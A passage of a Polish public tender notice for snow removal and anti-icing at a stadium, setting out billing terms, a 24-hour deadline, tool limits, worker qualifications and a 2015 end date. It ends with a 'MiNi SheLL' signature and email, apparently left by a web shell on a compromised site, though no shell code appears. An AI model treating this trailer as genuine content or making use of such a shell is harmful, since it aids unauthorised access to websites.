2) powierzchnia z Tabeli nr 3 Zał. Nr 2 do SIWZ będzie rozliczana na zasadzie opłaty za m2, powierzchni tych nie można odśnieżać przy użyciu ciężkich maszyn typu spychacz. Zamawiający przyjmuje formę rozliczania za faktycznie odśnieżoną powierzchnię.
3)	Powierzchnia z tabeli nr 4 Zał. Nr 2 do SIWZ - trybuny  wraz z przestrzeniami pomiędzy nimi będzie rozliczana za 1000 siedzisk. Powierzchni tych nie można odśnieżać przy użyciu ciężkich maszyn typu spychacz. Zamawiający przyjmie formę rozliczania za faktycznie odśnieżoną powierzchnię.
4) Wykonawca do realizacji zamówienia skieruje każdorazowo taką ilość osób lub maszyn, aby zapewnić wykonanie przedmiotu umowy w możliwie jak najkrótszym terminie, ale nie dłuższym niż 24 godziny,
5) dopuszcza się usuwanie śniegu z promenady oraz ciągów pieszych jedynie za pomocą narzędzi               i urządzeń mechanicznych nie posiadających ostrych krawędzi mogących uszkodzić powierzchnię,
6) Wykonawca zabezpieczy miejsca, gdzie będzie składowany śnieg i lód przed dostępem osób trzecich,
7) Wykonawca w czasie trwania umowy jest zobowiązany do utrzymywania stałej gotowości do działań prewencyjnych, w ramach których jest zobowiązany do:
a)	monitorowania opadów i reakcji w przypadku ich nasilenia,
b)	zapobieganiu powstawania oblodzeń (czynność posypywania powierzchni śliskich),
nawet  w przypadku niewielkich opadów,
8) Wykonawca oprócz usuwania śniegu będzie zobowiązany posypywać wskazane miejsca, aby zabezpieczyć przed śliskością, 
9) osoby wykonujące usługę odśnieżania muszą posiadać odpowiednie kwalifikacje, uprawnienia, badania lekarskie, szkolenia BHP i aktualne zezwolenia do prac oraz odzież odblaskową.
10) Powierzchnie płyty boiska głównego, jak również powierzchnia boiska ze sztuczna murawą, Zamawiający odśnieża we własnym zakresie. Wykonawca zobowiązany będzie do załadunku,               a następnie wywozu śniegu usuniętego przez Zamawiającego z w/w powierzchni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com